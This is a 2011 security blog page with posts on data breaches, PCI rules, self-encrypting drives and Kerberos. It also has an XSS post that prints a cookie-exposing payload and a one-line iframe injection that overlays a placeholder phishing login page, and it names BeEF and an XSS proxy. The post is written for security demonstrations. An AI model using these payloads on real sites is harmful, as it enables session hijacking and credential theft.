More Data Loss, Eh?

Comptroller Susan Combs offered another apology Thursday for the information breach in her agency, saying she now is offering a year of free credit monitoring to the 3.5 million people at risk of identity theft after their data was exposed on a public computer server…She announced in a written statement April 11 that the Social Security numbers and other personal information of 3.5 million people were left exposed for a year or more in a publicly accessible computer server at her agency.

Dallas News

According to this article in the Dallas Morning News, 3.5 million identities were left free for the taking on a public server for at least a year. That is a colossal security lapse. However, it is a fairly responsible remediation that credit monitoring is being made available for the affected users. (Contrast this with Sony’s recent Playstation Network breach; Sony won’t even confirm whether or not credit card information was accessed in their attack.) Still, had literally any effort been put into keeping that information secured, the state of Texas wouldn’t have to spend an estimated $21 million for the credit monitoring services.

The security arena is one in which the maxim “an ounce of prevention is worth a pound of cure” holds especially true. How much would it have cost to audit that server deployment? A few thousand dollars? Tens of thousands of dollars? Hundreds of thousands? Any answer less than “21 million dollars” means that this should never have happened.

Post to Twitter Post to Facebook

Posted April 29 2011

PSN break in

If you haven’t heard already about the PlayStation Network compromise, you should pay attention if you have a PS3 and use PSN. Your PSN online ID, name, address and birthdate have all been compromised, and (potentially) your secret questions, and credit card numbers. What I don’t understand is why Sony can’t definitively tell us that the secret questions and answers or the credit card numbers have been stolen? PCI rules require strict controls over the CC information, and the PAN (CC number) must be stored *unreadable*

Render PAN, at minimum, unreadable anywhere it is stored (including on portable digital media, backup media, in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography
• Truncation
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures
The MINIMUM account information that must be rendered unreadable is the PAN.

And any access to it must be tracked “Track and monitor all access to network resources and cardholder data”.

So why can’t they tell if the data was accessed?

Either way, your data is “stolen” and can be used for identity theft. There are some indications that credit card information was stolen, but it’s not proven that it was stolen from Sony. Watch your credit card(s), your bank accounts and everywhere else you need to. If you used the same password elsewhere, change it (you should have already done that after Gawker media was compromised)

Post to Twitter Post to Facebook

Posted April 28 2011

XSS: More Than Just Alert Boxes

Cross-site scripting (XSS) vulnerabilities allow an attacker to inject content in an otherwise trusted web page. XSS attacks in the wild typically try to execute JavaScript, and consequently XSS issues are typically demonstrated with a script function that’s short, simple, and visual: the alert box. Many XSS examples use alert(1) or alert(‘XSS’) as a payload.

As others have noted, though, this fails to show the power of XSS, and may lead to a “so what?” reaction from developers not familiar with such a vulnerability. I like to compare alert(1) to showing that the safety of a gun is off. If someone has never handled or heard of a gun before, a small switch out of place won’t mean much. But when they see the gun fire and witness the damage a bullet can cause, the significance of that safety becomes apparent.

While I’m hardly the first to compile a list of example payloads that go beyond simple alert boxes (see also XSS – Exploitation beyond alert(‘xss’) and alert(‘xss’) – The slow death of XSS), I think it bears repeating that security professionals should be prepared to demonstrate the real dangers of XSS. Here are a few ideas to keep in your toolbox:

  1. Expose cookies. My personal preference for a simple alert box when checking XSS is alert(document.cookie). Even if a developer is not familiar with XSS, most will likely recognize that access to the session data stored in a user’s cookie presents a problem. And note that if the injected script can alert those values, it can also send them to an external server, allowing an attacker to take control of the victim’s account
  2. Gather real-world examples. While you’d certainly never want to just load a live payload on a vulnerable app, actual attacks against other sites are good testimonials for thinking about XSS. A few to get your file started:
    • Malware delivery on celebrity MySpace pages: Alicia Keys and other stars fell victim to an attack that didn’t even require JavaScript. An invisible <a> element covered the entire page, making any click send the user to a malicious site.
    • The Samy worm on MySpace: One of the fastest-spreading viruses used XSS. The Samy worm automatically friended other MySpace users and modified the profiles of victims. Its rapid spread caused MySpace to shut down temporarily.
    • Remote code execution on phones via the Android Market: A vulnerability in Google’s online store for Android apps could be used to send an install command when accessed from an Android phone. Once installed, the malicious app could then also be automatically launched.
    • Facebook bully video XSS payload: A recent attack exploiting a loophole in Facebook apps used event invites, chat messages, and Facebook pages to spread malicious links. The payload also included code for phishing account credentials.
  3. Phishing demo. Create a page that mimics your app’s login form but submits to a different location, and save it somewhere safe but accessible. Add this bit of code to quickly replace a vulnerable page with your phishing page:

    x=document.createElement('iframe'),x.src='http://yourphishingpage/', x.height='100%',x.width='100%',x.frameBorder='0',document.body=x

  4. Create a custom payload. Remember, once a script can be injected in a page, it basically has the same amount of access as any other script in the page. If you’re already familiar with code used by a vulnerable app, you can simply load a few of them with the XSS payload. With many sites using a range of client-side features, a few function calls can do quite a bit.
  5. Set up a BeEF demo. The Browser Exploitation Framework, or BeEF for short, is a tool that essentially lets you create a small botnet. BeEF can be used to log keystrokes, detect features or history, and even launch Metasploit to load more sophisticated attacks.
  6. Set up an XSS-based proxy. Tools such as Shell of the Future let you make requests for other sites from a victim’s browser and have the responses forwarded to your machine. This lets you tunnel traffic through other machines simply by exploiting XSS.

    Post to Twitter Post to Facebook

    Posted April 26 2011

    Security-minded Storage Devices

    While the software industry continues to make strides in the area of security and data protection, the hardware industry shouldn’t be underestimated. With the announcement of storage devices like Toshiba’s MK-61GSYG hard disk drives, it may only be a matter of time before we see even more creative security features for hardware (due, in part, to industry-wide adoption of standards). Toshiba’s harddrive comes with some interesting security tricks, including the ability to configure the disk to erase itself when connected to an unauthorized host, and the ability for the drive to self-encrypt without relying on the host computer’s operating system for cryptographic operations.

    Most of the features are drawn from the standards found in the Opal Security Subsystem Class (SSC) (pdf). The SSC is, in turn, based on the TCG Storage Architecture Core Specification. TCG is the same company behind the TPM platform standard, which was designed to let a system create and operate a trusted subenvironment from within an untrusted environment. The TPM platform still receives a fair amount of criticism for privacy issues and the potential for abuse.

    A similar approach is used for some OPAL-compliant storage devices: dedicated on-board hardware that can handle a range of specialized operations (maintenance, authentication, cryptography) independently. The result is hardware like the MK-61GSYG, which probably meets many storage security requirements right out of the box. Although much can be said of the controversy that can surrounds newer standards, they can certainly provide a welcome stepping stone for innovation.

    Post to Twitter Post to Facebook

    Posted April 21 2011

    Data Breach Report Overload

    It’s data breach report day today. Or, so it seems. My brain just ‘sploded on overload from all the fresh tasty stats received. There’s not enough time today to go through everything with a fine-toothed comb. Suffice to say:

    • Data breaches are continuing to happen in growing numbers.
    • Basic security practices still aren’t happening.
    • As painful as it is to admit, it appears that regulations like PCI DSS are having a positive impact.
    • Our codebase still leaves much to be desired, though there is reason to be a bit optimistic.

    That said, here’s the goods:

    1. Verizon Business 2011 Data Breach Investigation Report
    2. Veracode 2011 “State of Software Security” Report
    3. Ponemon 2011 PCI DSS Compliance Trends Study

    Incidentally, if you take the combined results of these studies, one of the key takeaways ties in very nicely with this quote from the current Cloud Security Alliance (CSA) v2.1 Security Guidance: “A portion of the cost savings obtained by Cloud Computing services must be invested into increased scrutiny of the security capabilities of the provider, application of security controls, and ongoing detailed assessments and audits, to ensure requirements are continuously met.” (h/t Gunnar Peterson)

    Post to Twitter Post to Facebook

    Posted April 19 2011

    Explaining security protocols

    Many papers and online explanations of security protocols are dense and quite complicated. And sometimes even security professionals don’t understand the explanations.

    When I first started at CMU, there was a class called “Internet Security”. I went to the first lecture and promptly dropped the class. I understood practical security – but this class focused on theoretical security. In the first class, we were given the “security language” of Kerberos. At the time, I had barely used Kerberos as part of the CMU computer systems, and certainly didn’t understand it – and didn’t realize that that’s what the class was about, until several years later. Now, I finally understand more, and really wish I hadn’t dropped that class.

    However, there are likely few people in the world (and most of those are likely in academia) that can understand the language presented in that class. It’s important for communication between researchers, but it leaves those of us with a more practical mindset scratching our heads.

    Back in 1988, Bill Bryant wrote a “play” to explain Kerberos. And once I found that play, I finally understood how Kerberos worked. It may not have been as short and succinct as the security language my class taught, but I understood it – and still understand it years later.

    Security folks sometimes have communications issues – it doesn’t hurt to try another method of communicating.

    Post to Twitter Post to Facebook

    Posted April 15 2011